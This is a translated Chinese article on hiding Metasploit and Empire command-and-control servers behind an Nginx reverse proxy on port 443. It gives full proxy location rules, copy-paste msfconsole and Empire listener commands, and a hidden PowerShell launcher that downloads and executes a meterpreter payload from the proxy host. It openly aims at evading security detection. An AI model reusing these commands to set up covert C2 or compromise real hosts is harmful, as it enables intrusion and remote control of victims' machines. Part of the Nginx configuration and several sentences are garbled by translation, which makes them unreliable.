翻译: WisFree
估计稿费: 200RMB (不服你也来投稿啊! )
投稿方式:向linwei#360.cn发送邮件或登录网络版在线投稿
基础知识
目前,大多数常用的命令控制(CC )工具,如Metasploit和Empire,用于通过HTTP传输网络通信数据。 对CC工具来说,HTTP协议之所以是更高效的选择,主要是因为它适用于当前的任何类型的通信网络和网络设备。 此外,使用" HTTP over TLS "可以将安全层添加到这些工具中,因为很难发现抄送流量。 如果企业或组织具有正确配置的Web代理,则可以执行SSL/TLS检查的代理可以帮助安全技术人员更好地发现抄送流量。 但是,在我协助测试的组织中,采取这种安全措施的组织不多。
为了覆盖所有非法操作,通过HTTP协议传输的CC流量必须在80端口或443端口上发送。 使用特殊端口(如8080 )发送CC数据,不仅会引起管理员的怀疑,而且无法避免安全软件的发现。 我个人喜欢在同一台主机上使用多种类型的工具。 如果在一台主机上同时使用Empire和Metasploit网络传输模块,则总共需要三个网络端口。 通常,选择使用80端口、8080端口和443端口。 但是我现在想通过端口443发送所有的网络流量。 因此,现在就可以使用SwordShield提供的安全分析服务,在一个CC代理上完成所有分析操作。
接下来,我们打算使用Nginx构建反向代理服务器。 可以使用一个Web服务同时处理多用户-多工具情况,如下图所示。 代理服务器配置完成后,代理规则负责划分发送到C2服务器端口的通信。 此外,在这种配置中,还可以隐藏CC服务的“真实身份”(实际主机)。 Nginx不仅安装和配置非常简单,而且操作也非常方便。 多用户-多工具抄送代理体系结构如下图所示。
安装和配置Nginx
首先,在VPS服务器上安装您喜欢的Linux发行版。 如果需要,也可以安装在自己的服务器上。 为了清楚起见,我们决定在VPS主机上安装Ubuntu 16.10。 如果您在安装和运行Nginx方面遇到困难,请参见本教程[获取教程]。 配置后,只启用了80个端口的服务,并且只通过443个端口发送网络通信。
在开始测试之前,必须设置Nginx。 如果不进行设置,代理服务器将不知道如何处理这些通信连接。 为了防止暴力破解攻击,我们必须给每个分析器分配一个GUID。 单击此处可以生成相应的GUID。 我生成的GUID如下表所示。
我总共设置了三个分析器。 有关每个分析器的配置信息如下:
1234567891011213141516171920212223242528293031323334338340414244547484950555657 # analyst1location/analyst1location/al Empire location/e 0922 bb0-684 B- 4ed3- 967 e-85d 08880 cf D5/e/{ proxy _ pass https://205.232.71.92:43; } # metasploit location/e 0922 bb0- 684 B- 4ed3- 967 e-85d 08880 cf D5/m/{ # metasploit exploit/multi/script/web _ deld } } # metasploitpayloadwindows/x64/meter preter/reverse _ https location/e 0922 bb0- 684 B- 4ed3- 967 e-85d 08880 cf D5/m # Empire location/30061 CD8-0 CEE-4381-B3 F8 -
B50DCACA4CC8/e/ { proxy_pass https://1.2.3.5:443; } #Metasploit location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/ { #Metasploit exploit/multi/script/web_delivery location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/Delivery { proxy_pass https://1.2.3.5:8080; } #Metasploit Payload windows/x64/meterpreter/reverse_https location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/Pwned { proxy_pass https://1.2.3.5:80; } }}#Analyst 3location /6012A46E-C00C-4816-9DEB-7B2697667D92/ { proxy_redirect off; #Empire location /6012A46E-C00C-4816-9DEB-7B2697667D92/e/ { proxy_pass https://1.2.3.6:443; } #Metasploit location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/ { #Metasploit exploit/multi/script/web_delivery location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/Delivery { proxy_pass https://1.2.3.6:8080; } #Metasploit Payload windows/x64/meterpreter/reverse_https location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/Pwned { proxy_pass https://1.2.3.6:80; } }}由于我们要让Nginx需要区分出Metasploit和Empire的请求,所以我突发奇想,打算用‘m’来代表Metasploit,用‘e’来代表Empire。Empire的C2请求如下所示:
1https://myc2proxy.com/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/index.asp现在,既然我们已经可以确定传入的HTTP请求所使用的语句了,那么Nginx就需要将每一个请求转发至适当的分析代理服务器中,这项操作可以使用Nginx配置文件(/etc/nginx/sites-enabled/default)中的定位指令来完成。在这篇文章中,我们要为每一个分析器分别设置四个定位指令。在上面这段代码中,最外层的指令将会与分析器的GUID进行匹配。内层的定位指令主要用来匹配针对特定工具的请求,例如‘e’(Empire)和‘m’(Metasploit)。Metasploit的定位指令包含两个子定位指令,这两个指令可以用来匹配传入Metasploit特定模块和监听器的网络请求。
现在,C&C代理服务器应该配置完成并且可以正常运行了。如果配置无误的话,我们将只能使用TLS连接和端口443来与服务器进行通信。
Metasploit的安装与配置
众所周知,Metasploit提供了很多的功能模块,我们可以使用这些模块来与目标用户的计算机建立C2连接。我个人比较喜欢使用“exploit/multi/script/web_delivery”模块来作为launcher。我之所以非常喜欢这个模块,主要是因为它可以将meterpreter(ShellCode)注入至目标主机的内存中。这是一种非常理想的情况,因为你可以直接使用目标主机中的内置工具来进行操作,而不必向目标主机发送任何的文件。
接下来,我们要加载Nginx配置文件所需要使用的Metasploit模块,并使用URIPATH来对其进行设置。需要注意的是,自带的payload handler必须被禁用,因为我们要单独配置这些payload。在配置这个模块的过程中,payload使用的是“windows/x64/meterpreter/reverse_https”,然后将LHOST和LPORT设置为C2代理服务器的IP地址和端口号。请注意,这里可千万不要设置成后台C2服务器的IP地址了。除此之外,我们还要设置与payload(例如Pwned)和Nginx中的指令相匹配的LURI。虽然相应的监听器根本不会启动,但我们仍然要去配置这些payload。因为接下来当模块被执行之后,我们要使用这些设置来生成显示在屏幕中的启动命令。我们可以将下面给出的这段指令直接复制粘贴到msfconsole中来配置并启动该模块:
12345678910use exploit/multi/script/web_deliveryset URIPATH /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Deliveryset DisablePayloadHandler trueset SSL Trueset TARGET 2set payload windows/x64/meterpreter/reverse_httpsset LHOST myc2proxy.comset LPORT 443set LURI /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Pwnedrun –j下图显示的是Metasploit中web_delivery模块的配置信息:
当模块被执行后,屏幕中会显示一个包含有启动代码的字符串。请注意:必须将网络端口由8080改为443,否则之后将无法再进行修改了。除此之外,我们还必须手动去修改,因为我们的C2代理只会接受来自端口443的通信请求。这个字符串如下所示:
1powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$o=new-object net.webclient;$o.proxy=[Net.WebRequest]::GetSystemWebProxy();$o.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $o.downloadstring('https://myc2proxy.com:8080/E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Delivery');接下来,将LHOST设置为0.0.0.0,LPORT设置为80(端口号的设置可以根据后台C2服务器来选择)。我们还需要配置OverrideLHOST、OverrideLPORT、以及OverrideRequestHost来确保payload可以直接与C2代理服务器进行对话。我们可以将下面给出的命令直接复制粘贴到msfconsole中来配置并启动该模块:
12345678910use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_httpsset LHOST 0.0.0.0set LPORT 80set LURI /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Pwnedset OverrideLHOST myc2proxy.comset OverrideLPORT 443set OverrideRequestHost trueset ExitOnSession falserun –j下图显示的是reverse_https的payload配置信息:
Empire的安装与配置
虽然Empire是我最喜欢的一款工具,但是在配置代理服务器的过程中,使用Empire之前还是有几个障碍需要克服的,相比之下Metasploit的配置和使用就简单多了。在PowerShell v1中,初始链接序列所使用STAGE0、STAGE1和STAGE2是在empire.db的配置表中定义的。在我看来,我们是无法在Empire CLI中修改这部分数据的,所以我们必须直接手动修改数据库。但是,PowerShell Empire v2并没有使用这种架构。我建议各位同学使用git来下载Empire v2分支,命令如下:
1cd /opt;git clone -b 2.0_beta https://github.com/adaptivethreat/Empire.git下载完成之后,启动应用。由于Empire监听器所使用的端口必须与C2代理服务器的监听端口相同,所以Empire必须使用端口443和HTTPS协议。我们可以直接将下面给出的这段命令复制粘贴进Empire中来配置监听器:
123456789listenersuselistener httpset DefaultProfile /E0922BB0-684B-4ED3-967E-85D08880CFD5/e/admin/get.php,/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/news.asp,/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/login/process.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0;rv:11.0) like Geckoset Name EmpireC2set CertPath /opt/Empire/data/empire.pemset Host https://myc2proxy.comset Port 443executelauncher powershellEmpire监听器的配置信息如下图所示:
执行
现在,我们已经为Nginx C2代理配置好了一个用于分析数据流量的后台C2服务器了。接下来,我们要在测试主机中执行我们所生成的其中一个launcher,你将会在后台C2服务器中看到测试主机的shell。为了增加安全措施,配置后台C2服务器只允许当前C2代理访问。
结论
代理可以用来保持后台服务的匿名性。暴躁的酒窝需要在某个网络中进行命令控制活动时,代理所提供的这种特性是非常有用的。由于HTTPS的通信数据足够安全,因此现在越来越多的网络都开始使用HTTPS来进行通信了。但是,这也将有助于我们躲避安全产品的检测。